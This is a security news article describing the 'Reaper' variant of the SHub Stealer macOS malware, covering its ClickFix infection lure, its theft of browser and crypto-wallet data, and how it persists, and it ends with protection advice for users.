New SHub Stealer Variant 'Reaper' Automates macOS Infections, Targets Browsers and Crypto Wallets

A dangerous new variant of the SHub Stealer malware has emerged, targeting Mac users with advanced techniques designed for stealth and efficiency. Dubbed 'Reaper,' this updated build spreads through deceptive websites that impersonate popular software, luring unsuspecting users into downloading malicious payloads. Once executed, Reaper can silently exfiltrate sensitive data, including browser credentials and cryptocurrency from digital wallets, often before the victim realizes their system has been compromised.

What sets Reaper apart is its automated infection vector. Unlike previous macOS malware that might require users to manually copy and paste commands into the Terminal, Reaper leverages a fake webpage to silently open the Mac's Script Editor. This editor is pre-loaded with malicious code, and a single click from the user is sufficient to initiate the infection process. This 'ClickFix' technique, as identified by Moonlock researchers, represents a growing trend among macOS threat actors who are adopting and refining proven tactics from one another.

The campaign goes to significant lengths to appear legitimate. Attackers spoof well-known brands and host their malware on domains that closely mimic authentic ones. They often disguise malware downloads as critical security updates from Apple or use fake Google Software Update pathways to establish persistent backdoors. This high degree of deception allows the malware to bypass user suspicion and embed itself deeply within the victim's system, leading to a multi-stage attack that can result in stolen data, drained financial accounts, and a compromised system under remote attacker control.

Reaper represents a substantial upgrade over earlier SHub Stealer versions. While previous iterations could already pilfer browser data, macOS Keychains, iCloud account information, and Telegram session data, the new variant expands its reach significantly. It now actively targets a wide array of browsers, including Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, along with their associated extensions. This broad targeting ensures a larger potential victim pool.

The malware's approach to cryptocurrency theft is particularly concerning. Instead of deploying fake wallet applications, Reaper directly modifies the code of legitimate desktop wallet software already installed on the victim's Mac. This allows it to surreptitiously siphon funds from targeted wallets such as Exodus, Atomic, Ledger Live, Electrum, and Trezor Suite. Additionally, Reaper incorporates an AMOS-style Filegrabber module designed to scan Desktop and Documents folders for valuable files in formats like .docx, .wallet, .key, .csv, .xls, and .json.

Upon successfully gathering stolen data, Reaper bundles it and uses the legitimate curl command to exfiltrate the information to an attacker-controlled server. To ensure persistence, it installs a backdoor disguised as a Google update service, allowing it to survive system reboots and remain hidden from detection. This sophisticated combination of social engineering, automated execution, broad targeting, and stealthy persistence makes SHub Reaper a formidable threat to macOS users.

Protection against Reaper hinges on user vigilance and security best practices. Users should be extremely wary of any webpage that prompts them to open their Script Editor or Terminal and execute code. Closing such windows immediately is crucial. Furthermore, users should never enter their system password in response to a pop-up that appears immediately after installing new software, as this is a common indicator of malicious activity. For cryptocurrency holders, moving funds to offline cold wallets or dedicated hardware is strongly recommended. Maintaining up-to-date operating systems and security software provides an essential layer of defense against emerging malware variants.